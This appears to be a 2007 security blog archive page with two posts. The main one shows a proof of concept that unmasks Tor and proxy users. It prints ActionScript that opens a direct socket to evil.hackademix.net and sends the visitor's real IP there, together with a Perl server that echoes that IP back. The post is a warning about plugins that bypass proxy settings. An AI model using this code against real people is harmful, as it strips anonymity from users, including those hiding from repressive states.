• Flattr this

Archive for the IE Category

Next Entries »
26 09 2007

Cross-Browser Proxy Unmasking

Posted by: Giorgio in IE, Anonymity, Flash, Java, Security, NoScript

It’s really time to sleep in my timezone, but I just couldn’t resist when I read latest RSnake’s post about Deanonymizing Tor and Detecting Proxies.

The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

This caveat has been preached even on the Tor download page itself, but nothing better than some scary demos to convert the non believers.

RSnake’s interesting proof of concept exploits JavaScript + LiveConnect , and it apparently works on Gecko-based browser with Java™ installed only. I didn’t manage to make it work on Opera, even though it does support LiveConnect.

So I decided to defer bedtime a bit and I put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser, like Internet Explorer, supporting the Flash player (no need for JavaScript, either).
The

XMLSocket

ActionScript object is used to bypass browser’s proxy setting and connect to a tiny server written in Perl, listening on port 9999 and echoing client’s IP.

Here’s the ActionScript code:

  1. var socket = new XMLSocket();
  2. socket.onConnect = function(success) {
  3. socket.onXML = function(doc) {
  4. getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
  5. doc.firstChild.firstChild.nodeValue);
  6. socket.close();
  7. };
  8. socket.send(new XML());
  9. };
  10. socket.connect("evil.hackademix.net", 9999);
Download this code: pbp.as

And here’s the Perl server:

  1. #!/usr/bin/perl -w
  2. use strict;
  3. use IO::Socket;
  4.  
  5. my $port = shift || 9999;
  6. my $sock = new IO::Socket::INET(
  7. LocalPort => $port,
  8. Proto => ‘tcp’,
  9. Listen => SOMAXCONN,
  10. Reuse => 1);
  11. $sock or die "socket: $!";
  12. my($new_sock, $c_addr, $buf);
  13. while (($new_sock, $c_addr) = $sock->accept())
  14. {
  15. my ($client_port, $client_ip) = sockaddr_in($c_addr);
  16. print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
  17. $new_sock->close();
  18. }
Download this code: pbp.pl

Today’s lesson is: if you want to stay anonymous, you’d better turn off Java, Flash and any other plugin!

Update OCT-27

I’ve just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, this works also in browsers, like IE, not supporting LiveConnect.
The lesson above obviously applies, even stronger.

Demos

Comments 19 Comments »

16 09 2007

IE’s “Non-Bug” Can Cost Your (Second)Life

Posted by: Giorgio in IE, Mozilla, Security

Very short summary:

  1. IE pwns Firefox and Mozilla blames Microsoft for not sanitizing URLs before throwing them at other applications.
  2. Firefox pwns… all the world and Mozilla recognizes the same bug that had been blamed on IE affects Firefox itself.
  3. Mozilla devs fix their bug immediately, while people like Alun Jones (Security Microsoft Valued Partner) and Markellos Diorinos (IE Product Manager) deny such a bug exists at all, thus IE won’t be fixed.
  5. Profit!

And this time I can’t even insert my usual NoScript plug ;)

Comments 8 Comments »

Next Entries »

Bad Behavior has blocked 8106 access attempts in the last 7 days.